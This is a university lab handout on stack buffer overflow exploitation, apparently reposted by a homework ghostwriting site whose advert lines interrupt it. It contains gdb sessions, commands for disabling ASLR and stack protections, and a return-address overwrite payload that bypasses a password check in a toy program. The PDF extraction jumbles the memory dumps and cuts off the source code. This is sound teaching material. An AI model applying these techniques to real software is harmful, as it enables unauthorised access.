计算机代写 FIT2093 – cscodehelp代写
Monash University – FIT2093
Week 8 Lab
IMPORTANT NOTES:
Software Security Lab
Copyright By cscodehelp代写 加微信 cscodehelp
1. Studylecturematerialsatleast1hourandprepareQuestion1-6underBufferOverflowSectionprior to the lab session. Prepared questions will be discussed in the lab session.
1 Lab Description
The learning objective of this lab is for students to gain first-hand experiences on buffer overflow vulnerability exploitation.
2 Buffer Overflow
This exercise allows you to experiment with a variation of the buffer overflow attacks demonstrated in the lecture. It works with the cloud Ubuntu Linux.
Before we start the lab exercise, first we need to disable the Address Space Layout Randomization (ASLR):
sudo sysctl -w kernel.randomize_va_space=0
Here we first show an example of how to overwrite the returning address of a function call:
1. Copythesourcecode/srv/fit2093files/fit2093lab/auth_overflow2.c1tothehomedirectoryandcom- pile the code, include symbol info. for debugger (-g), disable stack protector (–fno-stack-protector), allow the stack to contain executable code (-z execstack), use 32-bit (-m32), and disable the Position Independent Executables (PIE) (-fno-pie).
cp /srv/fit2093files/fit2093lab/auth_overflow2.c ~
gcc -fno-stack-protector -z execstack -g -m32 -fno-pie -o auth_overflow2 auth_overflow2.c
2. Load the program into the gdb debugger.
gdb auth_overflow2
3. List the program and set break points just before the buffer overflow point and after the overflow.
(gdb) list 1,35
1 #include
2 #include
3 #include
5 int check_authentication(char *password) {
7 char password_buffer[16];
8 int auth_flag[1];
10 auth_flag[0] = 0;
12 strcpy(password_buffer, password);
1Alternatively, you may download from https://cloudstor.aarnet.edu.au/plus/s/vBB59QZQ7WWtAO0 if you are using the local VM. 1
Monash University – FIT2093
Week 8 Lab
20 }
if(strcmp(password_buffer, “brillig”) == 0)
auth_flag[0] = 1;
if(strcmp(password_buffer, “outgrabe”) == 0)
auth_flag[0] = 1;
return auth_flag[0];
33 }
34 }
if(check_authentication(argv[1])) {
printf(“
-=-=-=-=-=-=-=-=-=-=-=-=-=-
”);
printf(” Access Granted.
”);
printf(“-=-=-=-=-=-=-=-=-=-=-=-=-=-
”);
printf(“
Access Denied.
”);
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s
(gdb) break 12
Breakpoint 1 at 0x125e: file auth_overflow2.c, line 12.
(gdb) break 19
Breakpoint 2 at 0x12ae: file auth_overflow2.c, line 19.
4. Runtheprogramwithaninput(payload),whichislargerthanthe16bytesbufferlength(say20“A”characters with ASCII code = 0x41).
(gdb) run $(perl -e ‘print “x41″x20’)
Starting program: /srv/home/rzha0026/auth_overflow2 $(perl -e ‘print “x41″x20’)
Breakpoint 1, check_authentication (password=0xffffd4b6 ‘A’
12 strcpy(password_buffer, password);
5. Disassemble the main() function code and locate the return address that execution returns to after the check_authentication function returns.
(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x565562b3 <+0>: endbr32
0x565562b7 <+4>:
0x565562bb <+8>:
0x565562be <+11>:
0x565562c1 <+14>:
0x565562c2 <+15>:
0x565562c4 <+17>:
0x565562c5 <+18>:
0x565562c8 <+21>:
0x565562ca <+23>:
0x565562cd <+26>:
0x565562cf <+28>:
0x565562d2 <+31>:
0x565562d4 <+33>:
0x565562d7 <+36>:
lea ecx,[esp+0x4]
and esp,0xfffffff0
push DWORD PTR [ecx-0x4]
push ebp
mov ebp,esp
push ecx
sub esp,0x4
mov eax,ecx
cmp DWORD PTR [eax],0x1
jg 0x565562ef
mov eax,DWORD PTR [eax+0x4]
mov eax,DWORD PTR [eax]
sub esp,0x8
push eax
Monash University – FIT2093
Week 8 Lab
0x565562d8 <+37>:
0x565562dd <+42>:
0x565562e2 <+47>:
0x565562e5 <+50>:
0x565562e8 <+53>:
0x565562ea <+55>:
0x565562ef <+60>:
0x565562f2 <+63>:
0x565562f5 <+66>:
0x565562f7 <+68>:
0x565562fa <+71>:
0x565562fb <+72>:
0x56556300 <+77>:
0x56556303 <+80>:
0x56556305 <+82>:
0x56556307 <+84>:
0x5655630a <+87>:
0x5655630f <+92>:
0x56556314 <+97>:
0x56556317 <+100>:
0x5655631a <+103>:
0x5655631f <+108>:
0x56556324 <+113>:
0x56556327 <+116>:
0x5655632a <+119>:
0x5655632f <+124>:
0x56556334 <+129>:
0x56556337 <+132>:
0x56556339 <+134>:
0x5655633c <+137>:
0x56556341 <+142>:
0x56556346 <+147>:
0x56556349 <+150>:
0x5655634e <+155>:
0x56556351 <+158>: leave
push 0x56557019
call 0xf7e1cde0
sub esp,0xc
push 0x0
call 0xf7e00f80
mov eax,DWORD PTR [eax+0x4]
add eax,0x4
mov eax,DWORD PTR [eax]
sub esp,0xc
push eax
call 0x5655624d
add esp,0x10
test eax,eax
je 0x56556339
sub esp,0xc
push 0x5655702f
call 0xf7e3a290
sub esp,0xc
push 0x5655704c
call 0xf7e3a290
sub esp,0xc
push 0x56557062
call 0xf7e3a290
jmp 0x56556349
sub esp,0xc
push 0x5655707e
call 0xf7e3a290
mov eax,0x0
mov ecx,DWORD PTR [ebp-0x4]
lea esp,[ecx-0x4]
0x56556355 <+162>: ret
End of assembler dump.
Note that in our case, 0x56556300 is the returning address (i.e. the instruction following the call to
check_authentication function). The instructions and addresses may be different in your VM. Examine the contents of the stack memory (starting the at the first byte of the password_buffer): (gdb) x/16xw password_buffer
0x56556352 <+159>:
0xffffd230:
0xffffd240:
0xffffd250:
0xffffd260:
0xf7fb0000
0xf7fb03fc
0xffffd4b6
0xf7fe22d0
0xf7fe22d0
0x00000001
0xffffd314
0xffffd280
0x00000000
0xffffd268
0xffffd320
0x00000000
0xf7e01212
0x56556300
0x56556381
0xf7de7ee5
Can you see the address after the end of the password_buffer in the check_authetntictation() stack frame where the return address is stored? (look for the return address you identified earlier in the stack memory dump).
6. Continue execution to next breakpoint (after the overflow strcpy), and examine the stack memory again. Can you see the overflow bytes containing the ’0x41’ characters? How large should the overflow be to reach and overwrite the return address?
Monash University – FIT2093 Week 8 Lab (gdb) continue
Continuing.
Breakpoint 2, check_authentication (password=0xffffd4b6 ‘A’
19 return auth_flag[0];
(gdb) x/16xw password_buffer
0xffffd230: 0x41414141 0x41414141
0xffffd240: 0x41414141 0x00000000
0xffffd250: 0xffffd4b6 0xffffd314
0xffffd260: 0xf7fe22d0 0xffffd280
7. Generate our attacker “payload” (in little endian) to overwrite the returning address to be the address of “Access Granted”. From the assembly code above, the program will check whether the return value of check_authentication is 0 by test eax,eax instruction. If the return value of check_authentication is 0 (i.e. fail), the program will jump to 0x56556339 by je 0x56556339 instruction. Therefore, from the source code, we know that the address after je 0x56556339 (i.e. 0x56556307) will be the “Access Granted” case.
(gdb) run $(perl -e ‘print “x07x63x55x56″x20’)
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /srv/home/rzha0026/auth_overflow2 $(perl -e ‘print “x07x63x55x56″x20’)
19 return auth_flag[0];
(gdb) x/16xw password_buffer
0xffffd1f0: 0x56556307 0x56556307
0xffffd200: 0x56556307 0x56556307
0xffffd210: 0x56556307 0x56556307
0xffffd220: 0x56556307 0x56556307
(gdb) continue
Continuing.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
0x56556307
0x56556307
0x56556307
0x56556307
0x56556307
0x56556307
0x56556307
0x56556307
0x41414141
0xffffd268
0xffffd320
0x00000000
0x41414141
0x56556300
0x56556381
0xf7de7ee5
Breakpoint 1, check_authentication (
Breakpoint 1, check_authentication (password=0xffffd47a “acUVacUVacUVacUVacUVacUVacUVacUVacUVacUVacUVacUVac
12 strcpy(password_buffer, password);
(gdb) x/16xw password_buffer
0xffffd1f0: 0xf7fb0000 0xf7fe22d0
0xffffd200: 0xf7fb03fc 0x00000001
0xffffd210: 0xffffd47a 0xffffd2d4
0xffffd220: 0xf7fe22d0 0xffffd240
(gdb) continue
Continuing.
Breakpoint 2, check_authentication (
password=0x56556307
0x00000000
0xffffd228
0xffffd2e0
0x00000000
0xf7e01212
0x56556300
0x56556381
0xf7de7ee5
Program received signal SIGSEGV, Segmentation fault.
0x56556355 in main (argc=
